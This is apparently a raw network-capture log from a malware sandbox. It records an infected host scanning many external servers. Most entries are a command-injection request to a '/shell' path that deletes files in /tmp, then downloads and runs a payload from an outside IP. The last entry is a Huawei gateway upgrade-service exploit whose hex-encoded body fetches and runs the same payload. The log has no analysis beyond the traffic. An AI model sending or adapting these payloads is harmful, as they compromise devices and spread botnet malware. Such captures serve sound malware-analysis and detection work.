                                                          Jan 2, 2024 06:24:30.942226887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:31.197698116 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:31 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:31 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 63 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 37 31 26 23 34 36 3b 36 35 31 31 64 66 61 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1c8e2117&#46;1704173071&#46;6511dfa1</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          272192.168.2.2351782106.15.76.4880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:31.040035963 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:31.332582951 CET463INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:31 GMT
                                                          Server: Apache
                                                          Content-Length: 285
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          273192.168.2.234034420.70.223.6480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:31.051080942 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          274192.168.2.2358056118.99.59.24980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:31.063069105 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:31.378161907 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:31 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          275192.168.2.234321652.66.124.19680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:31.144022942 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:31.504784107 CET426INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:31 GMT
                                                          Server: Apache/2.4.56 (Amazon Linux)
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          276192.168.2.2333286202.75.103.11780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:31.278951883 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          277192.168.2.236061027.54.141.22480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:31.491938114 CET181INHTTP/1.0 400 Bad request
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                          Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          278192.168.2.236085423.209.26.22980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:32.802583933 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:32.982178926 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:32 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:32 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 62 37 62 33 35 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 37 32 26 23 34 36 3b 31 63 39 61 65 64 31 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1b7b3517&#46;1704173072&#46;1c9aed1d</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          279192.168.2.2341464117.20.101.12580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:32.881656885 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:33.143791914 CET427INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:33 GMT
                                                          Server: Apache
                                                          Vary: Accept-Encoding
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          280192.168.2.234336847.96.31.6080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:32.931560993 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          281192.168.2.2358566138.118.173.13280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:33.144309044 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:33.406930923 CET354INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:24:33 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          282192.168.2.235039861.220.62.14580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:33.218082905 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:33.504822016 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:24:33 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:33 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 31 33 65 64 63 33 64 26 23 34 36 3b 31 37 30 34 31 37 33 30 37 33 26 23 34 36 3b 31 64 36 61 35 62 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;913edc3d&#46;1704173073&#46;1d6a5bc</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          283192.168.2.2360496155.159.137.880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:33.306233883 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:33.632405996 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:33 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          284192.168.2.234483023.218.15.4380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:34.799252987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:34.944009066 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:34 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:34 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 38 61 61 33 37 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 37 34 26 23 34 36 3b 35 33 34 64 33 65 32 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;88aa3717&#46;1704173074&#46;534d3e2c</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          285192.168.2.2340366104.25.137.9580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:34.920244932 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          286192.168.2.2357290146.126.59.11380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:34.936316967 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:35.659712076 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:36.491703033 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:38.155378103 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:41.610892057 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:48.265995026 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:01.576090097 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:29.732106924 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          287192.168.2.234962051.17.132.4780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:34.942337990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          288192.168.2.2353884156.235.102.23437215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:34.990700006 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
